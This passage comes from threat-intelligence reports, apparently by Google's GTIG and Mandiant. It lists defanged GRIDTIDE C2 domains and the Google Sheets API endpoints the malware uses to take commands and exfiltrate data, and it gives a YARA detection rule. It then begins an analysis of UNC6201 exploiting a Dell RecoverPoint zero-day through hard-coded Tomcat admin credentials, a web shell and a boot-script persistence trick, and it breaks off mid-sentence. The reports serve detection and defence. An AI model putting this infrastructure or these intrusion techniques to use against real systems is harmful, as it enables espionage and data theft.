<td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">telkom[.]ooguy[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">telkomservices[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">thbio[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">timpe[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">timpe[.]webredirect[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">tlse001hdfuwwgdgpnn[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">tltlsktelko[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">transport[.]dynuddns[.]net</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">trvcl[.]bumbleshrimp[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ttsiou12[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ua2o25yth[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">udieyg[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">unnjunnani[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">updatamail[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">updatasuccess[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">updateservices[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">updatetools[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">uscplxsecjs[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">USOShared1[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">vals[.]bumbleshrimp[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">vass[.]ooguy[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">vass2025[.]casacam[.]net</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">vmtools[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">vmtools[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">vosies[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">vpaspmine[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">wdlcamaakc[.]ooguy[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">winfoss1[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ysiohbk[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zammffayhd[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zmcmvmbm[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zwmn350n3o1fsdf3gs[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zwmn350n3o1ugety2xbe[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zwmn350n3o1vsdrggs[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zwt310n3o1unety2kab[.]webredirect[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zwt310n3o2unety6a3k[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zwt31n3t0nidoqmve[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zwt3ln3t1aimckalw[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SHA256 Hash</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Self-signed X.509 SSL certificate</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d25024ccea8eac85a9522289cfb709f2ed4e20176dd37855bacc2cd75c995606</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">URLs</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Archive contained GRIDTIDE.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">http://130[.]94[.]6[.]228/apt.tar.gz</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Archive contained a SoftEtherVPN Bridge component.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">http://130[.]94[.]6[.]228/update.tar.gz</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Archive contained a SoftEtherVPN Bridge component.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">http://130[.]94[.]6[.]228/amp.tar.gz</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIDTIDE leverages this API endpoint to monitor cell </span><span style="vertical-align: baseline;">A1</span><span style="vertical-align: baseline;"> of the spreadsheet for threat actor commands.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">https://sheets[.]googleapis[.]com:443/v4/spreadsheets/&lt;GoogleSheetID&gt;/values/A1?valueRenderOption=FORMULA</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIDTIDE leverages this API endpoint to clear data from the first 1000 rows of the spreadsheet.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">https://sheets[.]googleapis[.]com:443/v4/spreadsheets/&lt;GoogleSheetID&gt;/values:batchClear</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIDTIDE leverages this API endpoint to exfiltrate victim host metadata to cell </span><code style="vertical-align: baseline;">V1</code><span style="vertical-align: baseline;">, report command execution output and status messages to cell </span><code style="vertical-align: baseline;">A1</code><span style="vertical-align: baseline;">, and to transfer data into the </span><code style="vertical-align: baseline;">A2:An</code><span style="vertical-align: baseline;"> cell range.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">https://sheets[.]googleapis[.]com:443/v4/spreadsheets/&lt;GoogleSheetID&gt;/values:batchUpdate</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIDTIDE leverages this API endpoint to transfer data from the </span><code style="vertical-align: baseline;">A2:An</code><span style="vertical-align: baseline;"> cell range to the victim host.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">https://sheets[.]googleapis[.]com:443/v4/spreadsheets/&lt;GoogleSheetID&gt;/values/A2:A&lt;cell_number&gt;?valueRenderOption=FORMULA</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">GRIDTIDE YARA Rule</span></h4></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_Backdoor_GRIDTIDE_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = { 7B 22 61 6C 67 22 3A 22 52 53 32 35 36 22 2C 22 6B 69 64 22 3A 22 25 73 22 2C 22 74 79 70 22 3A 22 4A 57 54 22 7D 00 } $s2 = { 2F 70 72 6F 63 2F 73 65 6C 66 2F 65 78 65 00 } $s3 = { 7B 22 72 61 6E 67 65 73 22 3A 5B 22 61 31 3A 7A 31 30 30 30 22 5D 7D 00 } $s4 = { 53 2D 55 2D 25 73 2D 31 00 } $s5 = { 53 2D 55 2D 52 2D 31 00 } $s6 = { 53 2D 44 2D 25 73 2D 30 00 } $s7 = { 53 2D 44 2D 52 2D 25 64 00 } condition: (uint32(0) == 0x464c457f) and 6 of ($*) }</code></pre></div>Wed, 25 Feb 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign/Google Threat Intelligence Group Mandiant https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day/<div class="block-paragraph_advanced"><p>Written by: Peter Ukhanov, Daniel Sislo, Nick Harbour, John Scarbrough, Fernando Tomlinson, Jr., Rich Reece</p> <hr/></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Mandiant and Google Threat Intelligence Group (GTIG) have identified the zero-day exploitation of a high-risk vulnerability in </span><a href="https://www.dell.com/en-us/lp/dt/data-protection-suite-recoverpoint-for-virtual-machines" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Dell RecoverPoint </span><span style="text-decoration: underline; vertical-align: baseline;">for Virtual Machines</span></a><span style="vertical-align: baseline;">, tracked as CVE-2026-22769</span>, <span style="vertical-align: baseline;">with a CVSSv3.1 score of 10.0</span><span style="vertical-align: baseline;">. Analysis of incident response engagements revealed that UNC6201,</span><span style="vertical-align: baseline;"> a suspected PRC-nexus threat cluster, has exploited this flaw since at least mid-2024 to move laterally, maintain persistent access, and deploy malware including SLAYSTYLE, BRICKSTORM,</span><span style="vertical-align: baseline;"> and a novel backdoor tracked as GRIMBOLT.</span><span style="vertical-align: baseline;"> The initial access vector for these incidents was not confirmed, but <span style="vertical-align: baseline;">UNC6201</span></span><span style="vertical-align: baseline;"> is known to target edge appliances (such as VPN concentrators) for initial access. There are notable overlaps between <span style="vertical-align: baseline;">UNC6201</span></span><span style="vertical-align: baseline;"> and UNC5221,</span><span style="vertical-align: baseline;"> which has been used synonymously with the actor publicly reported as Silk Typhoon, although GTIG does not currently consider the two clusters to be the same.</span></p> <p><span style="vertical-align: baseline;">This report builds on </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span style="text-decoration: underline; vertical-align: baseline;">previous GTIG research</span></a><span style="vertical-align: baseline;"> into <span style="vertical-align: baseline;">BRICKSTORM</span></span><span style="vertical-align: baseline;"> espionage activity, providing a technical deep dive into the exploitation of <span style="vertical-align: baseline;">CVE-2026-22769</span></span><span style="vertical-align: baseline;"> and the functionality of the <span style="vertical-align: baseline;">GRIMBOLT</span></span><span style="vertical-align: baseline;"> malware. Mandiant identified a campaign featuring the replacement of older <span style="vertical-align: baseline;">BRICKSTORM</span></span><span style="vertical-align: baseline;"> binaries with <span style="vertical-align: baseline;">GRIMBOLT</span></span><span style="vertical-align: baseline;"> in September 2025. <span style="vertical-align: baseline;">GRIMBOLT</span></span><span style="vertical-align: baseline;"> represents a shift in tradecraft; this newly identified malware, written in C# and compiled using native ahead-of-time (AOT) compilation, is designed to complicate static analysis and enhance performance on resource-constrained appliances.</span></p> <p><span style="vertical-align: baseline;">Beyond the Dell appliance exploitation, Mandiant observed the actor employing novel tactics to pivot into VMware virtual infrastructure, including the creation of "Ghost NICs" for stealthy network pivoting and the use of iptables for Single Packet Authorization (SPA).</span></p> <p><span style="vertical-align: baseline;">Dell has released </span><span style="vertical-align: baseline;">remediations</span><span style="vertical-align: baseline;"> for <span style="vertical-align: baseline;">CVE-2026-22769</span></span><span style="vertical-align: baseline;">, and customers are urged to follow the guidance in the official </span><a href="https://www.dell.com/support/kbdoc/en-us/000426773" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Security Advisory</span></a><span style="vertical-align: baseline;">. This post provides actionable hardening guidance, detection opportunities, and a technical analysis of the <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">UNC6201</span></span></span><span style="vertical-align: baseline;"> tactics, techniques, and procedures (TTPs).</span></p> <h3><span style="vertical-align: baseline;">GRIMBOLT</span></h3> <p><span style="vertical-align: baseline;">During analysis of compromised Dell RecoverPoint </span><span style="vertical-align: baseline;">for Virtual Machines</span><span style="vertical-align: baseline;">, Mandiant discovered the presence of <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">BRICKSTORM</span></span></span><span style="vertical-align: baseline;"> binaries and the subsequent replacement of these binaries with <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">GRIMBOLT</span></span></span><span style="vertical-align: baseline;"> in September 2025. <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">GRIMBOLT</span></span></span><span style="vertical-align: baseline;"> is a C#-written foothold backdoor compiled using native ahead-of-time (AOT) compilation and packed with </span><code style="vertical-align: baseline;">UPX</code><span style="vertical-align: baseline;">. It provides a remote shell capability and uses the same command and control as previously deployed <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">BRICKSTORM</span></span></span><span style="vertical-align: baseline;"> payload. </span><span style="vertical-align: baseline;">It's unclear if the threat actor's replacement of <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">BRICKSTORM</span></span></span><span style="vertical-align: baseline;"> with <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">GRIMBOLT</span></span></span><span style="vertical-align: baseline;"> was part of a pre-planned life cycle iteration by the threat actor or a reaction to incident response efforts led by Mandiant and other industry partner</span><span style="vertical-align: baseline;">s. </span><span style="vertical-align: baseline;">Unlike traditional .NET software that uses just-in-time (JIT) compilation at runtime, Native AOT-compiled binaries, introduced to .NET in 2022, are converted directly to machine-native code during compilation. This approach enhances the software’s performance on resource-constrained appliances, ensures required libraries are already present in the file, and complicates static analysis by removing the common intermediate language (CIL) metadata typically associated with C# samples.</span></p> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">UNC6201</span></span></span> established <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">BRICKSTORM</span></span></span><span style="vertical-align: baseline;"> and <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">GRIMBOLT</span></span></span><span style="vertical-align: baseline;"> persistence on the Dell RecoverPoint for Virtual Machines by modifying a legitimate shell script named </span><code style="vertical-align: baseline;">convert_hosts.sh</code><span style="vertical-align: baseline;"> to include the path to the backdoor. This shell script is executed by the appliance at boot time via </span><code style="vertical-align: baseline;">rc.local</code><span style="vertical-align: baseline;">.</span></span></p> <h3><span style="vertical-align: baseline;">CVE-2026-22769</span></h3> <p><span style="vertical-align: baseline;">Mandiant discovered <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">CVE-2026-22769</span></span></span><span style="vertical-align: baseline;"> while investigating multiple Dell RecoverPoint </span><span style="vertical-align: baseline;">for Virtual Machines</span><span style="vertical-align: baseline;"> within a victim’s environment that had active C2 associated with <span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">BRICKSTORM</span></span></span></span></span><span style="vertical-align: baseline;"> and <span style="vertical-align: baseline;"><span style="vertical-align: baseline;">GRIMBOLT</span></span></span><span style="vertical-align: baseline;"> backdoors. During analysis of the appliances, analysts identified multiple web requests to an appliance prior to compromise using the username </span><code style="vertical-align: baseline;">admin</code><span style="vertical-align: baseline;">. These requests were directed to the installed Apache Tomcat Manager, used to deploy various components of the Dell RecoverPoint software, and resulted in the deployment of a malicious WAR file containing a <span style="vertical-align: baseline;">SLAYSTYLE</span></span><span style="vertical-align: baseline;"> web shell.</span></p> <p><span style="vertical-align: baseline;">After analyzing various configuration files belonging to Tomcat Manager, we identified a set of hard-coded default credentials for the </span><code style="vertical-align: baseline;">admin</code><span style="vertical-align: baseline;"> user in </span><code style="vertical-align: baseline;">/home/kos/tomcat9/tomcat-users.xml</code><span style="vertical-align: baseline;">. Using these 